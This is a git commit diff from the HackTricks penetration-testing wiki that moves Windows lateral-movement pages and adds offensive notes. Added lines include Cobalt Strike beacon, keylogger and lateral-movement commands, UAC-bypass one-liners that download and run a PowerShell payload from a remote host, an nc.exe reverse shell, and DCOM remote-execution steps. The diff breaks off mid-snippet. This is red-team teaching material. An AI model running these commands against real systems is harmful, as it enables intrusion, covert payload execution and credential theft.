GitBook: [#3371] No subject

This commit is contained in:
CPol 2022-08-13 15:36:34 +00:00 committed by gitbook-bot
parent 554a2c5bf4
commit 5c8fe5feac
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
36 changed files with 372 additions and 81 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 5.6 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 5.6 KiB

After

Width:  |  Height:  |  Size: 755 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 755 KiB

After

Width:  |  Height:  |  Size: 346 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 94 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 94 KiB

After

Width:  |  Height:  |  Size: 7.8 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 7.8 KiB

After

Width:  |  Height:  |  Size: 169 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 19 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 19 KiB

After

Width:  |  Height:  |  Size: 58 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 58 KiB

After

Width:  |  Height:  |  Size: 947 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 60 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 60 KiB

After

Width:  |  Height:  |  Size: 99 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 114 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 114 KiB

After

Width:  |  Height:  |  Size: 814 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 96 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 96 KiB

After

Width:  |  Height:  |  Size: 75 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 23 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 23 KiB

After

Width:  |  Height:  |  Size: 169 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 75 KiB

After

Width:  |  Height:  |  Size: 177 KiB

View file

@ -180,11 +180,13 @@
* [Unconstrained Delegation](windows-hardening/active-directory-methodology/unconstrained-delegation.md)
* [NTLM](windows-hardening/ntlm/README.md)
* [Places to steal NTLM creds](windows-hardening/ntlm/places-to-steal-ntlm-creds.md)
* [PsExec/Winexec/ScExec](windows-hardening/ntlm/psexec-and-winexec.md)
* [SmbExec/ScExec](windows-hardening/ntlm/smbexec.md)
* [WmicExec](windows-hardening/ntlm/wmicexec.md)
* [AtExec / SchtasksExec](windows-hardening/ntlm/atexec.md)
* [WinRM](windows-hardening/ntlm/winrm.md)
* [Lateral Movement](windows-hardening/lateral-movement/README.md)
* [AtExec / SchtasksExec](windows-hardening/lateral-movement/atexec.md)
* [DCOM Exec](windows-hardening/lateral-movement/dcom-exec.md)
* [PsExec/Winexec/ScExec](windows-hardening/lateral-movement/psexec-and-winexec.md)
* [SmbExec/ScExec](windows-hardening/lateral-movement/smbexec.md)
* [WinRM](windows-hardening/lateral-movement/winrm.md)
* [WmicExec](windows-hardening/lateral-movement/wmicexec.md)
* [Authentication, Credentials, UAC and EFS](windows-hardening/authentication-credentials-uac-and-efs.md)
* [Stealing Credentials](windows-hardening/stealing-credentials/README.md)
* [Credentials Protections](windows-hardening/stealing-credentials/credentials-protections.md)

View file

@ -30,7 +30,7 @@ You can **select the architecture** inside Visual Studio in the **left "Build" T
Then, build both projects (Build -> Build Solution) (Inside the logs will appear the path of the executable):
![](<../.gitbook/assets/image (1) (2).png>)
![](<../.gitbook/assets/image (1) (2) (1).png>)
## Prepare the Backdoor
@ -103,17 +103,17 @@ Open the SalseoLoader project using Visual Studio.
### Add before the main function: \[DllExport]
![](<../.gitbook/assets/image (2) (1).png>)
![](<../.gitbook/assets/image (2) (1) (1).png>)
### Install DllExport for this project
#### **Tools** --> **NuGet Package Manager** --> **Manage NuGet Packages for Solution...**
![](<../.gitbook/assets/image (3) (1).png>)
![](<../.gitbook/assets/image (3) (1) (1).png>)
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
![](<../.gitbook/assets/image (4).png>)
![](<../.gitbook/assets/image (4) (1).png>)
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
@ -131,13 +131,13 @@ Then, go to your **SalseoLoader folder** and **execute DllExport\_Configure.bat*
Select **x64** (if you are going to use it inside a x64 box, that was my case), select **System.Runtime.InteropServices** (inside **Namespace for DllExport**) and press **Apply**
![](<../.gitbook/assets/image (7).png>)
![](<../.gitbook/assets/image (7) (1).png>)
### **Open the project again with visual Studio**
**\[DllExport]** should not be longer marked as error
![](<../.gitbook/assets/image (8).png>)
![](<../.gitbook/assets/image (8) (1).png>)
### Build the solution

View file

@ -2,13 +2,24 @@
### Listeners
Cobalt Strike -> Listeners -> Add/Edit then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more
### C2 Listeners
`Cobalt Strike -> Listeners -> Add/Edit` then you can select where to listen, which kind of beacon to use (http, dns, smb...) and more.
### Peer2Peer Listeners
The beacons of these listeners don't need to talk to the C2 directly, they can communicate to it through other beacons.
`Cobalt Strike -> Listeners -> Add/Edit` then you need to select the TCP or SMB beacons
* The **TCP beacon will set a listener in the port selected**. To connect to a TCP beacon use the command `connect <ip> <port>` from another beacon
* The **smb beacon will listen in a pipename with the selected name**. To connect to a SMB beacon you need to use the command `link [target] [pipe]`.
### Generate & Host payloads
#### Generate payloads in files
Attacks -> Packages ->&#x20;
`Attacks -> Packages ->`&#x20;
* **`HTMLApplication`** for HTA files
* **`MS Office Macro`** for an office document with a macro
@ -17,7 +28,7 @@ Attacks -> Packages ->&#x20;
#### Generate & Host payloads
A`ttacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
`Attacks -> Web Drive-by -> Scripted Web Delivery (S)` This will generate a script/executable to download the beacon from cobalt strike in formats such as: bitsadmin, exe, powershell and python
#### Host Payloads
@ -25,10 +36,8 @@ If you already has the file you want to host in a web sever just go to `Attacks
### Beacon Options
```bash
# Execute local .NET binary
execute-assembly </path/to/executable.exe>
<pre class="language-bash"><code class="lang-bash"># Execute local .NET binary
execute-assembly &#x3C;/path/to/executable.exe>
# Screenshots
printscreen # Take a single screenshot via PrintScr method
@ -39,4 +48,30 @@ screenwatch # Take periodic screenshots of desktop
# keylogger
keylogger [pid] [x86|x64]
## View > Keystrokes to see the keys pressed
```
# Import Powershell module
powershell-import C:\path\to\PowerView.ps1
# User impersonation
make_token [DOMAIN\user] [password] #Create token tom impersonate user
# Lateral Movement
## If a token was created it will be used
jump [method] [target] [listener]
## Methods:
## psexec x86 Use a service to run a Service EXE artifact
## psexec64 x64 Use a service to run a Service EXE artifact
## psexec_psh x86 Use a service to run a PowerShell one-liner
## winrm x86 Run a PowerShell script via WinRM
## winrm64 x64 Run a PowerShell script via WinRM
remote-exec [method] [target] [command]
## Methods:
<strong>## psexec Remote execute via Service Control Manager
</strong>## winrm Remote execute via WinRM (PowerShell)
## wmi Remote execute via WMI
## To execute a beacon with wmi (it isn't ins the jump command) just upload the beacon and execute it
beacon> upload C:\Payloads\beacon-smb.exe
beacon> remote-exec wmi srv-1 C:\Windows\beacon-smb.exe
</code></pre>

View file

@ -382,10 +382,10 @@ crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --pass-pol #Get
crackmapexec smb <IP> -d <DOMAIN> -u Administrator -p 'password' --rid-brute #RID brute
```
### [**psexec**](../windows-hardening/ntlm/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/ntlm/smbexec.md)
### [**psexec**](../windows-hardening/lateral-movement/psexec-and-winexec.md)**/**[**smbexec**](../windows-hardening/lateral-movement/smbexec.md)
Both options will **create a new service** (using _\pipe\svcctl_ via SMB) in the victim machine and use it to **execute something** (**psexec** will **upload** an executable file to ADMIN$ share and **smbexec** will point to **cmd.exe/powershell.exe** and put in the arguments the payload --**file-less technique-**-).\
**More info** about [**psexec** ](../windows-hardening/ntlm/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/ntlm/smbexec.md).\
**More info** about [**psexec** ](../windows-hardening/lateral-movement/psexec-and-winexec.md)and [**smbexec**](../windows-hardening/lateral-movement/smbexec.md).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
```bash
@ -398,7 +398,7 @@ psexec \\192.168.122.66 -u Administrator -p q23q34t34twd3w34t34wtw34t # Use pass
Using **parameter**`-k` you can authenticate against **kerberos** instead of **NTLM**
### [wmiexec](../windows-hardening/ntlm/wmicexec.md)/dcomexec
### [wmiexec](../windows-hardening/lateral-movement/wmicexec.md)/dcomexec
Stealthily execute a command shell without touching the disk or running a new service using DCOM via **port 135.**\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/
@ -419,7 +419,7 @@ Using **parameter**`-k` you can authenticate against **kerberos** instead of **N
#You can append to the end of the command a CMD command to be executed, if you dont do that a semi-interactive shell will be prompted
```
### [AtExec](../windows-hardening/ntlm/atexec.md)
### [AtExec](../windows-hardening/lateral-movement/atexec.md)
Execute commands via the Task Scheduler (using _\pipe\atsvc_ via SMB).\
In **kali** it is located on /usr/share/doc/python3-impacket/examples/

View file

@ -420,13 +420,13 @@ As seen in this page in [**previous payloads**](jndi-java-naming-and-directory-i
In the CTF, you **couldn't access the stderr** of the java application using log4J, but Log4J **exceptions are sent to stdout**, which was printed in the python app. This meant that triggering an exception we could access the content. An exception to exfiltrate the flag was: **`${java:${env:FLAG}}`.** This works because **`${java:CTF{blahblah}}`** doesn't exist and an exception with the value of the flag will be shown:
![](../../.gitbook/assets/image.png)
![](<../../.gitbook/assets/image (7).png>)
### Conversion Patterns Exceptions
Just to mention it, you could also inject new [**conversion patterns**](https://logging.apache.org/log4j/2.x/manual/layouts.html#PatternLayout) and trigger exceptions that will be logged to `stdout`. For example:
![](<../../.gitbook/assets/image (3).png>)
![](<../../.gitbook/assets/image (3) (1).png>)
This wasn't found useful to exfiltrate date inside the error message, because the lookup wasn't solved before the conversion pattern, but it could be useful for other stuff such as detecting.

View file

@ -16,7 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
![](<../../.gitbook/assets/image (2).png>)
![](<../../.gitbook/assets/image (2) (1).png>)
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
@ -110,7 +110,7 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
![](<../../.gitbook/assets/image (1).png>)
![](<../../.gitbook/assets/image (1) (2).png>)
## **wget File Upload/SSRF Trick**

View file

@ -99,8 +99,8 @@ copy afile.txt \\vulnerable.computer\C$\Windows\Temp
You will also be able to obtain a shell inside the host or execute arbitrary commands using **psexec**:
{% content-ref url="../ntlm/psexec-and-winexec.md" %}
[psexec-and-winexec.md](../ntlm/psexec-and-winexec.md)
{% content-ref url="../lateral-movement/psexec-and-winexec.md" %}
[psexec-and-winexec.md](../lateral-movement/psexec-and-winexec.md)
{% endcontent-ref %}
### HOST
@ -135,8 +135,8 @@ wmic remote.computer.local list full /format:list
Find **more information about wmiexec** in the following page:
{% content-ref url="../ntlm/wmicexec.md" %}
[wmicexec.md](../ntlm/wmicexec.md)
{% content-ref url="../lateral-movement/wmicexec.md" %}
[wmicexec.md](../lateral-movement/wmicexec.md)
{% endcontent-ref %}
### HOST + WSMAN (WINRM)
@ -149,8 +149,8 @@ New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC
Check the following page to learn **more ways to connect with a remote host using winrm**:
{% content-ref url="../ntlm/winrm.md" %}
[winrm.md](../ntlm/winrm.md)
{% content-ref url="../lateral-movement/winrm.md" %}
[winrm.md](../lateral-movement/winrm.md)
{% endcontent-ref %}
{% hint style="warning" %}

View file

@ -1,4 +1,4 @@
# Authentication, Credentials, UAC and EFS
<details>
@ -16,14 +16,13 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# Security Support Provider Interface (SSPI)
## Security Support Provider Interface (SSPI)
Is the API that can be use to authenticate users.
The SSPI will be in charge of finding the adequate protocol for two machines that want to communicate. The preferred method for this is Kerberos. Then the SSPI will negotiate which authentication protocol will be used, these authentication protocols are called Security Support Provider (SSP), are located inside each Windows machine in the form of a DLL and both machines must support the same to be able to communicate.
## Main SSPs
### Main SSPs
* **Kerberos**: The preferred one
* %windir%\Windows\System32\kerberos.dll
@ -36,27 +35,27 @@ The SSPI will be in charge of finding the adequate protocol for two machines tha
* **Negotiate**: It is used to negotiate the protocol to use (Kerberos or NTLM being Kerberos the default one)
* %windir%\Windows\System32\lsasrv.dll
### The negotiation could offer several methods or only one.
#### The negotiation could offer several methods or only one.
# Local Security Authority (LSA)
## Local Security Authority (LSA)
The **credentials** (hashed) are **saved** in the **memory** of this subsystem for Single Sign-On reasons.\
**LSA** administrates the local **security policy** (password policy, users permissions...), **authentication**, **access tokens**...\
LSA will be the one that will **check** for provided credentials inside the **SAM** file (for a local login) and **talk** with the **domain controller** to authenticate a domain user.
The **credentials** are **saved** inside the **process **_**LSASS**_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
The **credentials** are **saved** inside the **process \_LSASS**\_: Kerberos tickets, hashes NT and LM, easily decrypted passwords.
# Credentials Storage
## Credentials Storage
## Security Accounts Manager (SAM)
### Security Accounts Manager (SAM)
Local credentials are present in this file, the passwords are hashed.
## LSASS
### LSASS
We have talk about this. Different credentials are saved in the memory of this process.
## LSA secrets
### LSA secrets
LSA could save in disk some credentials:
@ -65,15 +64,15 @@ LSA could save in disk some credentials:
* Passwords for scheduled tasks
* More (password of IIS applications...)
## NTDS.dit
### NTDS.dit
It is the database of the Active Directory. It is only present in Domain Controllers.
## Credential Manager store
### Credential Manager store
Allows browsers and other Windows applications to save credentials.
# UAC
## UAC
UAC is used to allow an **administrator user to not give administrator privileges to each process executed**. This is **achieved using default** the **low privileged token** of the user. When, the administrator executes some process **as administrator**, a **UAC elevation** is performed and if it is successfully completed, the privileged token is used to create the process.
@ -89,7 +88,7 @@ Then, to **bypass** the **UAC** (elevate from **medium** integrity level **to hi
You can **check** the _**Manifest**_ of a binary using the tool _**sigcheck.exe**_ from Sysinternals. And you can **see** the **integrity level** of the processes using _Process Explorer_ or _Process Monitor_ (of Sysinternals).
## Check UAC
### Check UAC
First you need to check the value of the key **EnableLUA**, if it's **`1`** then UAC is **activated**, if its **`0`** or it **doesn't exist**, then UAC is **inactive**.
@ -97,7 +96,7 @@ First you need to check the value of the key **EnableLUA**, if it's **`1`** then
reg query HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\
```
Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`**in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`** in the same entry of the registry as before (info from [here](https://docs.microsoft.com/en-us/openspecs/windows\_protocols/ms-gpsb/341747f5-6b5d-4d30-85fc-fa1cc04038d4)):
* If **`0`** then, UAC won't prompt (like **disabled**)
* If **`1`** the admin is **asked for username and password** to execute the binary with high rights (on Secure Desktop)
@ -106,20 +105,20 @@ Then you have to check the value of the key **`ConsentPromptBehaviorAdmin`**in t
* If **`4`** like `2` but not necessary on Secure Desktop
* if **`5`**(**default**) it will ask the administrator to confirm to run non Windows binaries with high privileges
Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`** \
Then, you have to take a look at the value of **`LocalAccountTokenFilterPolicy`**\
If the value is **`0`**, then, only the **RID 500** user (**built-in Administrator**) is able to perform **admin tasks without UAC**, and if its `1`, **all accounts inside "Administrators"** group can do them.
And, finally take a look at the value of the key **`FilterAdministratorToken`**\
If **`0`**(default), the **built-in Administrator account can** do remote administration tasks and if **`1`** the built-in account Administrator **cannot** do remote administration tasks, unless `LocalAccountTokenFilterPolicy` is set to `1`.
### Summary
#### Summary
* If **`EnableLUA=0`**or **doesn't exist**, **no UAC for anyone**
* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=0` ** and ** `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
* If ** `EnableLua=1` ** and **`LocalAccountTokenFilterPolicy=0` ** and ** `FilterAdministratorToken=1`, UAC for everyone**
* If `EnableLUA=0` or **doesn't exist**, **no UAC for anyone**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=1` , No UAC for anyone**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=0`, No UAC for RID 500 (Built-in Administrator)**
* If `EnableLua=1` and **`LocalAccountTokenFilterPolicy=0` and `FilterAdministratorToken=1`, UAC for everyone**
## UAC bypass
### UAC bypass
{% hint style="info" %}
Note that if you have graphical access to the victim, UAC bypass is straight forward as you can simply click on "Yes" when the UAS prompt appears
@ -137,11 +136,11 @@ net user %username%
whoami /groups | findstr Level
```
### **Very** Basic UAC "bypass" (full file system access)
#### **Very** Basic UAC "bypass" (full file system access)
If you have a shell with a user that is inside the Administrators group you can **mount the C$** shared via SMB (file system) local in a new disk and you will have **access to everything inside the file system** (even Administrator home folder).
{% hint style="info" %}
{% hint style="warning" %}
**Looks like this trick isn't working anymore**
{% endhint %}
@ -153,9 +152,9 @@ cd C$
dir \\127.0.0.1\c$\Users\Administrator\Desktop
```
### UAC disabled
#### UAC disabled
If UAC is already disabled (**`ConsentPromptBehaviorAdmin`**is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
If UAC is already disabled (`ConsentPromptBehaviorAdmin` is **`0`**) you can **execute a reverse shell with admin privileges** (high integrity level) using something like:
```bash
#Put your reverse shell instead of "calc.exe"
@ -163,14 +162,35 @@ Start-Process powershell -Verb runAs "calc.exe"
Start-Process powershell -Verb runAs "C:\Windows\Temp\nc.exe -e powershell 10.10.14.7 4444"
```
### UAC bypass exploits
#### UAC bypass with token duplication
You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like_Source\Akagi\outout\x64\Debug\Akagi.exe_) , you will need to know **which one you need.**\
* [https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/](https://ijustwannared.team/2017/11/05/uac-bypass-with-token-duplication/)
* [https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html](https://www.tiraniddo.dev/2018/10/farewell-to-token-stealing-uac-bypass.html)
#### UAC bypass with cobalt strike
The Cobalt Strike techniques will only work if UAC is not set at it's max security level
```bash
# UAC bypass via token duplication
elevate uac-token-duplication [listener_name]
# UAC bypass via service
elevate svc-exe [listener_name]
# Bypass UAC with Token Duplication
runasadmin uac-token-duplication powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
# Bypass UAC with CMSTPLUA COM interface
runasadmin uac-cmstplua powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.5.120:80/b'))"
```
#### UAC bypass exploits
You could also use some tools to **bypass UAC like** [**UACME** ](https://github.com/hfiref0x/UACME)which is a **compilation** of several UAC bypass exploits. Note that you will need to **compile UACME using visual studio or msbuild**. The compilation will create several executables (like\_Source\Akagi\outout\x64\Debug\Akagi.exe\_) , you will need to know **which one you need.**\
You should **be careful** because some bypasses will **prompt some other programs** that will **alert** the **user** that something is happening.
**Empire** and **Metasploit** also have several modules to **bypass** the **UAC**.
### More UAC bypass
#### More UAC bypass
**All** the techniques used here to bypass AUC **require** a **full interactive shell** with the victim (a common nc.exe shell is not enough).
@ -180,7 +200,7 @@ You can get using a **meterpreter** session. Migrate to a **process** that has t
(_explorer.exe_ should works)
## Your own bypass - Basic UAC bypass methodology
### Your own bypass - Basic UAC bypass methodology
If you take a look to **UACME** you will note that **most UAC bypasses abuse a Dll Hijacking vulnerabilit**y (mainly writing the malicious dll on _C:\Windows\System32_). [Read this to learn how to find a Dll Hijacking vulnerability](windows-local-privilege-escalation/dll-hijacking.md).
@ -191,11 +211,11 @@ If you take a look to **UACME** you will note that **most UAC bypasses abuse a D
2. **IFileOperation**: Windows 10.
4. Prepare a **script** to copy your DLL inside the protected path and execute the vulnerable and autoelevated binary.
### Another UAC bypass technique
#### Another UAC bypass technique
Consists on watching if an **autoElevated binary** tries to **read** from the **registry** the **name/path** of a **binary** or **command** to be **executed** (this is more interesting if the binary searches this information inside the **HKCU**).
# EFS (Encrypted File System)
## EFS (Encrypted File System)
EFS works by encrypting a file with a bulk **symmetric key**, also known as the File Encryption Key, or **FEK**. The FEK is then **encrypted** with a **public key** that is associated with the user who encrypted the file, and this encrypted FEK is stored in the $EFS **alternative data stream** of the encrypted file. To decrypt the file, the EFS component driver uses the **private key** that matches the EFS digital certificate (used to encrypt the file) to decrypt the symmetric key that is stored in the $EFS stream. From [here](https://en.wikipedia.org/wiki/Encrypting\_File\_System).
@ -206,25 +226,23 @@ Examples of files being decrypted without the user asking for it:
The encrypted files using this method can be **tansparently access by the owner user** (the one who has encrypted them), so if you can **become that user** you can decrypt the files (changing the password of the user and logins as him won't work).
## Check EFS info
### Check EFS info
Check if a **user** has **used** this **service** checking if this path exists:`C:\users\<username>\appdata\roaming\Microsoft\Protect`
Check **who** has **access** to the file using cipher /c \<file>\
You can also use `cipher /e` and `cipher /d` inside a folder to **encrypt** and **decrypt** all the files
## Decrypting EFS files
### Decrypting EFS files
### Being Authority System
#### Being Authority System
This way requires the **victim user** to be **running** a **process** inside the host. If that is the case, using a `meterpreter` sessions you can impersonate the token of the process of the user (`impersonate_token` from `incognito`). Or you could just `migrate` to process of the user.
### Knowing the users password
#### Knowing the users password
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -240,5 +258,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View file

@ -244,6 +244,12 @@ https://slaeryan.github.io/posts/falcon-zero-alpha.html
Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
```
## Get permissions
```bash
Get-Acl -Path "C:\Program Files\Vuln Services" | fl
```
## OS version and HotFixes
```bash

View file

@ -0,0 +1,42 @@
# Lateral Movement
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>
There are different different ways to execute commands in external systems, here you can find the explanations on how the main Windows lateral movements techniques work:
* [**PsExec**](psexec-and-winexec.md)****
* [**SmbExec**](smbexec.md)****
* [**WmicExec**](wmicexec.md)****
* [**AtExec / SchtasksExec**](atexec.md)****
* [**WinRM**](winrm.md)****
* [**DCOM Exec**](dcom-exec.md)****
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View file

@ -0,0 +1,175 @@
# DCOM Exec
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**.
</details>
## MMC20.Application
**DCOM** (Distributed Component Object Model) objects are **interesting** due to the ability to **interact** with the objects **over the network**. Microsoft has some good documentation on DCOM [here](https://msdn.microsoft.com/en-us/library/cc226801.aspx) and on COM [here](https://msdn.microsoft.com/en-us/library/windows/desktop/ms694363\(v=vs.85\).aspx). You can find a solid list of DCOM applications using PowerShell, by running `Get-CimInstance Win32_DCOMApplication`.
The [MMC Application Class (MMC20.Application)](https://technet.microsoft.com/en-us/library/cc181199.aspx) COM object allows you to script components of MMC snap-in operations. While enumerating the different methods and properties within this COM object, I noticed that there is a method named `ExecuteShellCommand` under Document.ActiveView.
![](<../../.gitbook/assets/image (3).png>)
You can read more on that method [here](https://msdn.microsoft.com/en-us/library/aa815396\(v=vs.85\).aspx). So far, we have a DCOM application that we can access over the network and can execute commands. The final piece is to leverage this DCOM application and the ExecuteShellCommand method to obtain code execution on a remote host.
Fortunately, as an admin, you can remotely interact with DCOM with PowerShell by using “`[activator]::CreateInstance([type]::GetTypeFromProgID`”. All you need to do is provide it a DCOM ProgID and an IP address. It will then provide you back an instance of that COM object remotely:
![](<../../.gitbook/assets/image (8).png>)
It is then possible to invoke the `ExecuteShellCommand` method to start a process on the remote host:
![](../../.gitbook/assets/image.png)
## ShellWindows & ShellBrowserWindow
The **MMC20.Application** object lacked explicit “[LaunchPermissions](https://technet.microsoft.com/en-us/library/bb633148.aspx)”, resulting in the default permission set allowing Administrators access:
![](<../../.gitbook/assets/image (4).png>)
You can read more on that thread [here](https://twitter.com/tiraniddo/status/817532039771525120).\
Viewing which other objects that have no explicit LaunchPermission set can be achieved using [@tiraniddo](https://twitter.com/tiraniddo)s [OleView .NET](https://github.com/tyranid/oleviewdotnet), which has excellent Python filters (among other things). In this instance, we can filter down to all objects that have no explicit Launch Permission. When doing so, two objects stood out to me: `ShellBrowserWindow` and `ShellWindows`:
![](<../../.gitbook/assets/image (1).png>)
Another way to identify potential target objects is to look for the value `LaunchPermission` missing from keys in `HKCR:\AppID\{guid}`. An object with Launch Permissions set will look like below, with data representing the ACL for the object in Binary format:
![](https://enigma0x3.files.wordpress.com/2017/01/launch\_permissions\_registry.png?w=690\&h=169)
Those with no explicit LaunchPermission set will be missing that specific registry entry.
### ShellWindows
The first object explored was [ShellWindows](https://msdn.microsoft.com/en-us/library/windows/desktop/bb773974\(v=vs.85\).aspx). Since there is no [ProgID](https://msdn.microsoft.com/en-us/library/windows/desktop/ms688254\(v=vs.85\).aspx) associated with this object, we can use the [Type.GetTypeFromCLSID](https://msdn.microsoft.com/en-us/library/system.type.gettypefromclsid\(v=vs.110\).aspx) .NET method paired with the[ Activator.CreateInstance](https://msdn.microsoft.com/en-us/library/system.activator.createinstance\(v=vs.110\).aspx) method to instantiate the object via its AppID on a remote host. In order to do this, we need to get the [CLSID](https://msdn.microsoft.com/en-us/library/windows/desktop/ms691424\(v=vs.85\).aspx) for the ShellWindows object, which can be accomplished using OleView .NET as well:
![shellwindow\_classid](https://enigma0x3.files.wordpress.com/2017/01/shellwindow\_classid.png?w=434\&h=424)
As you can see below, the “Launch Permission” field is blank, meaning no explicit permissions are set.
![screen-shot-2017-01-23-at-4-12-24-pm](https://enigma0x3.files.wordpress.com/2017/01/screen-shot-2017-01-23-at-4-12-24-pm.png?w=455\&h=401)
&#x20;Now that we have the CLSID, we can instantiate the object on a remote target:
```powershell
$com = [Type]::GetTypeFromCLSID("<clsid>", "<IP>") #9BA05972-F6A8-11CF-A442-00A0C90A8F39
